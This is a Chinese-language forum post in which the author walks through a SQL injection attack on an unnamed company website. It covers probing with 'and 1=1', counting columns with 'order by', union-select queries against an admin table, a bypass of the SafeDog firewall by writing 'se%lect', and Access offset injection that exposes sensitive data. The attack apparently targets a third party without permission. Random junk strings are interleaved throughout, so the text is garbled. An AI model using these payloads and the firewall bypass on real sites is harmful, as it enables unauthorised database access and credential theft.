打开网站,一个企业站。
# H2 Q: @ @/ O, _3 @2 J+ o: r3 \' | O5 i0 }1 `1 Y
0 S7 l8 U* q2 u1 g3 c+ S
顺手加个admin1 s% ^+ m2 M" h# L6 F
. Y5 Z. \3 w2 L( k2 ^
2 D2 N+ v1 z6 a. N# M默认后台。
0 r: q% d( c2 @回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。! v8 [! @; i, k) `6 o) p
; g5 s+ n k) A- l3 Q8 C" f7 X
: Q& J/ E' I; q' v5 K4 e
: P8 \0 I6 _/ \1 W所以就不用御剑扫了,待会直接封IP。" p z) }. T# N/ `" m
5 ?/ C: g7 l6 b* w5 l4 z# M& V
用order by语句判断是否存在注入。
; W0 K, z: b+ `+ v8 k3 Ghttp://www.xxx.com /product_show.asp?id=997 order by 1
( y/ ] f1 J! @0 ?http://www.xxx.com /product_show.asp?id=997 order by 100
: F+ y6 M, k+ R9 R现在存在注入,经测试后发现是9个字段。
1 I4 ?5 z( b9 G4 O% n
/ j& Z, R3 }/ K! I接下来进行联合查询,猜是否存在admin表。
3 n" L4 D# ^6 Uhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。. D/ [+ q% Z3 ^5 s" L9 Q) M
/ r* U( f/ L7 Y' m4 _' H
3 |! M. z0 m3 z" p: w5 P% I2 @5 C1 T
在select中间加个%,se%lect绕过安全狗。) x7 C" { q0 q/ _) {) W4 x! k
- p; d* T. y) ]) {0 n/ j) H- l+ w$ g! U4 z
发现存在admin表,然后开始手工猜常用的字段。
; V- L% `: h* e5 n$ m9 j2 P5 k纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
4 n7 _7 ^/ k2 Y, k 8 D* [* u# B; j L2 t4 j4 @
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。, u `8 \6 U `+ G# _; Z$ d1 L& @( k
3 }8 V& v# g) Q8 B+ I科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
: k" Z+ `) D$ @+ Ehttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin1 J2 K8 d. G" q5 P8 j! H
好了,敏感内容出显了。) r& w- Z' R1 u. J" k/ B' E2 P
5 V! F0 I0 M: c9 [( \% e1 I ?6 q9 ^# o% ?2 T2 [/ P
' k U$ U! V9 b# |3 n* R |